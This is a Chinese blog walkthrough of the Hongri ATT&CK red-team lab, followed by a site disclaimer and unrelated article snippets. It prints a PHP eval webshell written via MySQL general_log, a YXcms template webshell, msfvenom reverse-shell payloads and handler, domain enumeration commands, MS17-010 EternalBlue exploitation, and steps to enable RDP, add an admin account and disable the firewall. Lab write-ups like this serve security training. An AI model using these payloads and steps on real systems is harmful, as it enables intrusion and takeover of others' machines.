【精选】ATKCK红队评估实战靶场一 超详细过程思路

一、环境搭建

1.红日靶场下载:

靶场下载地址:
https://pan.baidu.com/s/1nC6V8e_EuKfaLb2IuEbe7w&shfl=sharepset
提取码:n1u2

2.内外网IP搭建

Windows 7 x64Windows Server 2008Win2K3 Metasploitablekali
内网IP:192.168.52.143192.168.52.138192.168.52.141
外网IP:192.168.27.129192.168.27.128
一、Windows 7 x64

需要设置两个网络适配器:

1.NAT模式

2.桥接模式

桥接模式设置:

二、Windows Server 2008

三、Win2K3 Metasploitable

3.检测内外网的网络正常

Windows 7 x64

与外网互通正常

与内网的两台主机网络互通

Windows Server 2008

因为win 7开启了防火墙,所以是无法ping通 的

Win2K3 Metasploitable

最后在 Win7 外网服务器主机的 C 盘找到 PhpStudy 启动 Web 服务

二、web渗透

1.信息收集

御剑扫描

扫描发现开启了3306、80、110端口

访问80端口的web页面

账号密码都是弱口令root

扫描目录,发现/phpmyadmin/目录

访问/phpmyadmin/目录

然后利用root root登录

2.日志导出getshell

general_log和general_log_file简述:
mysql打开general_log开关之后,所有对数据库的操作都将记录在general_log_file指定的文件目录中,
以原始的状态来显示,
如果将general_log开关打开,general_log_file指定一个php文件,
则查询的操作将会全部写入到general_log_file指定的文件,
可以通过访问general_log_file指定的文件来获取webshell
show variables like 'general%';  #查看set global general_log = "ON";  #开启ONset global general_log_file="C:/phpStudy/www/shell.php"  #绝对路径C:/phpStudy/wwwselect '<?php @eval($_POST[cmd]);?>';

3.yxcms

在phpmyadmin数据库中,看到了newyxcms数据库,猜测下这个是不是有个这个目录

/yxcms/目录

有个公告信息:

 本站为YXcms的默认演示模板,YXcms是一款基于PHP+MYSQL构建的高效网站管理系统。 后台地址请在网址后面加上/index.php?r=admin进入。 后台的用户名:admin;密码:123456,请进入后修改默认密码。 

登录后台

账号:admin
密码:123456

@eval($_POST[cmd]);#模板路径
protected/apps/default/view/default/info.php 

连接蚁剑

4.msf

msf6 > use payload/windows/x64/meterpreter/reverse_tcp
msf6 payload(windows/x64/meterpreter/reverse_tcp) > show options Module options (payload/windows/x64/meterpreter/reverse_tcp):Name      Current Setting  Required  Description----      ---------------  --------  -----------EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)LHOST                      yes       The listen address (an interface may be specified)LPORT     4444             yes       The listen portmsf6 payload(windows/x64/meterpreter/reverse_tcp) > generate -f exe -o 64.exe
[*] Writing 7168 bytes to 64.exe...

需要先生成64.exe,然后才可以使用下面的命令生成payload

##payload 生成msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.27.128 LPORT=5555 -f exe -o r.exemsfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.103.129 LPORT=5555 -f exe -o 32.exe 

把生成的64.exe传入蚁剑中C:/盘

kali监听
msfmsfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.11.82 LPORT=5555 -f exe -o 64.exeuse exploit/multi/handlerset payload windows/x64/meterpreter/reverse_tcprun

kali监听成功

三、内网信息收集

1.信息收集

c:\>net config workstation  #网络配置的信息c:\>chcp 65001 #改编码信息

ipconfig /all   查看本机ip,所在域**route print     打印路由信息**net view        查看局域网内其他主机名**arp -a          查看arp缓存whoaminet start       查看开启了哪些服务net share       查看开启了哪些共享net share ipc$  开启ipc共享net share c$    开启c盘共享net use \\192.168.xx.xx\ipc$ "" /user:""   与192.168.xx.xx建立空连接net use \\192.168.xx.xx\c$ "密码" /user:"用户名"  建立c盘共享dir \\192.168.xx.xx\c$\user    查看192.168.xx.xx c盘user目录下的文件net config Workstation   查看计算机名、全名、用户名、系统版本、工作站、域、登录域net user                 查看本机用户列表net user /domain         查看域用户**net localgroup administrators   查看本地管理员组(通常会有域用户)net view /domain         查看有几个域**net user 用户名 /domain   获取指定域用户的信息net group /domain        查看域里面的工作组,查看把用户分了多少组(只能在域控上操作)net group 组名 /domain    查看域中某工作组net group "domain admins" /domain  查看域管理员的名字net group "domain computers" /domain  查看域中的其他主机名net group "doamin controllers" /domain  查看域控制器(可能有多台)

四、内网横向渗透

1.信息收集

获得系统信息:sysinfo

进入shell,net view查看域内的其他机子:

定位域控:net group “domain controllers” /domain

OWA

定位域管:net group “domain admins” /domain

Ping域名获真实ip:
OWA.god.org对应:192.168.52.138

2.内网静态路由配置

MSF 的 autoroute模块是 MSF 框架中自带的一个路由转发功能,实现过程是 MSF 框架在已经获取的 Meterpreter Shell 的基础上添加一条去往“内网”的路由。

首先需要使用配置静态路由:

#加载MSF的autoroute模块,获取当前机器的所有网段信息
run post/multi/manage/autoroute  
#添加目标内网路由
run post/multi/manage/autoroute SUBNET=192.168.52.0 ACTION=ADD

添加失败,因为该路由已存在

3.MSF内网端口扫描

现在路由可达内网网段,可以先对内网主机进行探测。 1、先执行background 命令将当前执行的 Meterpreter 会话切换到后台(后续也可执行sessions -i 重新返回会话),然后使用 MSF 自带 auxiliary/scanner/portscan/tcp 模块扫描内网域成员主机 192.168.52.141 开放的端口:

我这里优先扫80 445(MS17-010) 3389(MS19-0708)

background use auxiliary/scanner/portscan/tcp
set rhosts 192.168.52.141
set ports 80,135-139,445,3306,3389
run

发现开启了445端口

2、同样的方法,发现域控主机192.168.52.138也开启了 445 端口:

set rhosts 192.168.52.138
set ports 80,135-139,445,3306,3389
run

4.利用ms17-010进行攻击

1、对于开启了 445 端口的 Windows 服务器,借助 MSF 自带的漏洞扫描模块进行扫描:

search ms17_010                #搜索MSF集成的与ms17_010漏洞相关的模块
use auxiliary/scanner/smb/smb_ms17_010 # 加载扫描exp
set rhosts 192.168.52.141      #设置被扫描的主机IP
run                           

可以看到内网其他两台主机都是存在ms17-010漏洞的

2、尝试利用永恒之蓝漏洞拿下域控主机192.168.52.138,使用 MSF 集成的 ms17-010 漏洞 EXP:

use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp
set rhosts 192.168.52.138
set command whoami
run

成功执行,但是shell反弹失败。

可以尝试psexec。但是也可能会不能成功。

use exploit/windows/smb/ms17_010_psexec
set payload windows/x64/meterpreter/bind_tcp
set rhosts 192.168.52.138
run

5.MSF开启远程桌面

sessions -lsessions -l 通常用于列出当前与远程系统建立的会话(sessions)。
这种命令通常是在Metasploit Framework(MSF)等工具中使用的

已经在 MSF 中获得 Win7 的 Shell,故只需要返回会话并执行命令

run post/windows/manage/enable_rdp是 Metasploit Framework(MSF)中的一个后渗透模块命令。
这个特定的模块旨在用于管理 Windows 系统的后渗透,并用于在被攻陷的 Windows 机器上启用远程桌面协议(RDP)。

6.win7开启3389

先回到win7界面

获得服务器 Shell 后开启远程桌面的方法,除了借助 MSF,在常规渗透过程也可以在 CMD 命令中实现:

#开启3389
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
# 添加账户密码
net user wsm Pass!@123456 /add
# 给账户添加为管理员权限
net localgroup administrators Tr0e /add
#查询是否成功添加用户
net user wsm
#添加防火墙规则
netsh advfirewall firewall add rule name="Open 3389" dir=in action=allow protocol=TCP localport=3389

7.域控主机141开启远程桌面连接

#msf 设置全局代理setg Proxies socks5:127.0.0.1:8989setg ReverseAllowProxy true##通过代理连接远程桌面proxychains rdesktop 192.168.52.141 -p hongrisec@2022 -u administrator

8.拿下域管主机138

同理再拿下域管主机
注意!域管主机连不上的话需要关闭防火墙!!!

##关闭防火墙:netsh firewall set opmode disable

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/184220.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

ROS学习笔记(一)- 创建工作空间和功能包

1.工作空间 工作空间(workspace)是一个存放工程开发相关文件的文件夹 • src &#xff1a;代码空间&#xff08;Source Space&#xff09; • build &#xff1a;编译空间&#xff08;Build Space&#xff09; • devel &#xff1a;开发空间&#xff08;Development Spa…

【LeetCode:1657. 确定两个字符串是否接近 | 计数 + 阅读理解】

&#x1f680; 算法题 &#x1f680; &#x1f332; 算法刷题专栏 | 面试必备算法 | 面试高频算法 &#x1f340; &#x1f332; 越难的东西,越要努力坚持&#xff0c;因为它具有很高的价值&#xff0c;算法就是这样✨ &#x1f332; 作者简介&#xff1a;硕风和炜&#xff0c;…

Ubuntu使用Nginx部署前端项目——记录

安装nginx 依次执行以下两条命令进行安装&#xff1a; sudo apt-get update sudo apt-get install nginx通过查看版本号查看是否安装成功&#xff1a; nginx -v补充卸载操作&#xff1a; sudo apt-get remove nginx nginx-common sudo apt-get purge nginx nginx-common su…

软件工程(十一)

逆向工程 定义 逆向工程 (reverse engineering)&#xff1a;指在软件生存周期中&#xff0c;将软件的某种形式描述转换成更抽象形式的活动 重构 重构 (restructuring&#xff09;&#xff1a;指在同一抽象级别上转换系统的描述形式。如把C程序转换成Java程序 设计恢复 设…

[ffmpeg] aac 音频编码

aac 介绍 aac 简单说就是音频的一种压缩编码器&#xff0c;相同音质下压缩比 mp3好&#xff0c;目前比较常用。 aac 编码支持的格式 aac 支持的 sample_fmts: 8 aac 支持的 samplerates: 96000 88200 64000 48000 44100 32000 24000 22050 16000 12000 11025 8000 7350 通…

PC企业微信http协议逆向接口开发,发送大视频文件

产品说明 一、 hook版本&#xff1a;企业微信hook接口是指将企业微信的功能封装成dll&#xff0c;并提供简易的接口给程序调用。通过hook技术&#xff0c;可以在不修改企业微信客户端源代码的情况下&#xff0c;实现对企业微信客户端的功能进行扩展和定制化。企业微信hook接口…

js字符串分割方法

使用split()方法 这可能是最常见的字符串分割方法&#xff0c;它使用指定的分隔符将字符串拆分为子字符串&#xff0c;并返回一个数组。例如&#xff1a; const str Hello World; const arr str.split( );console.log(arr); // [Hello, World]使用substring()方法 此方法从…

Pycharm中使用matplotlib绘制动态图形

Pycharm中使用matplotlib绘制动态图形 最终效果 最近用pycharm学习D2L时发现官方在jupyter notebook交互式环境中能动态绘制图形&#xff0c;但是在pycharm脚本环境中只会在最终 plt.show() 后输出一张静态图像。于是有了下面这段自己折腾了一下午的代码&#xff0c;用来在pych…

unity学习笔记12

一、物理系统 如何让一个球体受到重力的影响&#xff1f; 只要给物体添加刚体组件&#xff08;Rigidbody&#xff09;&#xff0c;就可以使其受到重力影响 1.刚体&#xff08;Rigidbody&#xff09;&#xff1a; 刚体是一个组件&#xff0c;用于使游戏对象受到物理引擎的控制。…

Leetcode2336. 无限集中的最小数字

Every day a Leetcode 题目来源&#xff1a;2336. 无限集中的最小数字 解法1&#xff1a;集合 由于一开始类中包含所有正整数&#xff0c;并且操作要么添加任意的正整数&#xff0c;要么删除最小的正整数&#xff0c;因此我们可以期望&#xff0c;在任意时刻&#xff0c;存…

pta—说反话加强版

给定一句英语&#xff0c;要求你编写程序&#xff0c;将句中所有单词的顺序颠倒输出。 输入格式&#xff1a; 测试输入包含一个测试用例&#xff0c;在一行内给出总长度不超过500 000的字符串。字符串由若干单词和若干空格组成&#xff0c;其中单词是由英文字母&#xff08;大小…

高速PCB设计中的射频分析与处理方法

射频&#xff08;Radio Frequency&#xff0c;RF&#xff09;电路在现代电子领域中扮演着至关重要的角色&#xff0c;涵盖了广泛的应用&#xff0c;从通信系统到雷达和射频识别&#xff08;RFID&#xff09;等。在高速PCB设计中&#xff0c;射频电路的分析和处理是一项具有挑战…

4152A/E/F 调制域分析仪(0.125Hz~4GHz/26.5GHz/40GHz)

4152A/E/F 调制域分析仪 频率范围覆盖&#xff1a;0.125Hz&#xff5e;40GHz 能够精确表征信号频率随时间动态变化规律 01 产品综述 4152系列调制域分析仪能够精确表征信号频率随时间动态变化规律&#xff0c;最大监测带宽36GHz&#xff0c;最短每隔100ns无隙监测&#xff…

C++学习寄录(九.多态)

1.多态基本概念 先来看这样的代码&#xff0c;我的本意是想要输出“小猫在说话”&#xff0c;但实际输出的却是“动物在说话”。这是因为地址早绑定&#xff0c;在代码编译阶段就已经确定了函数地址&#xff1b;如果想要实现既定目标&#xff0c;那么这个dospeak&#xff08;&…

练 习

写出sql语句&#xff0c;查询所有年龄大于20岁的员工2select * from employee where age>20;3写出sql语句&#xff0c;查询所有年龄大于等于22小于25的女性员工4select * from employee where age between 22 and 25 and sex女;5写出sql语句&#xff0c;统计男女员工各有多少…

html/css中用float实现的盒子案例

运行效果&#xff1a; 代码部分&#xff1a; <!doctype html> <html> <head> <meta charset"utf-8"> <title>无标题文档</title> <style type"text/css">.father{width:300px; height:400px; background:gray;…

C#WPF使用MaterialDesign 显示带遮罩的对话框

第一步定义对话框 <UserControlx:Class="TemplateDemo.Views.Edit.UCEditUser"xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"xmlns:d="http://schemas.m…

svn合并冲突时每个选项的含义

合并冲突时每个选项的含义 - 这个图片是 TortoiseSVN&#xff08;一个Subversion&#xff08;SVN&#xff09;客户端&#xff09;的合并冲突解决对话框。当你尝试合并两个版本的文件并且出现差异时&#xff0c;你需要解决这些差异。这个对话框提供了几个选项来处理合并冲突&…

如何打造更高效、安全、灵活的企业网络组网方案

随着互联网的快速发展&#xff0c;企业对于网络的需求也变得越来越高。然而&#xff0c;企业规模不断扩大&#xff0c;分布式办公越来越普遍&#xff0c;如何保证数据安全传输和网络稳定运行是每一家企业都需要面对的问题。因此&#xff0c;合理构建企业组网架构已经成为了现代…

22.Oracle中的临时表空间

Oracle中的临时表空间 一、临时表空间概述1、什么是临时表空间2、临时表空间的作用 二、临时表空间相关语法三、具体使用案例1、具体使用场景示例2、具体使用场景代码示例 点击此处跳转下一节&#xff1a;23.Oracle11g的UNDO表空间点击此处跳转上一节&#xff1a;21.Oracle的程…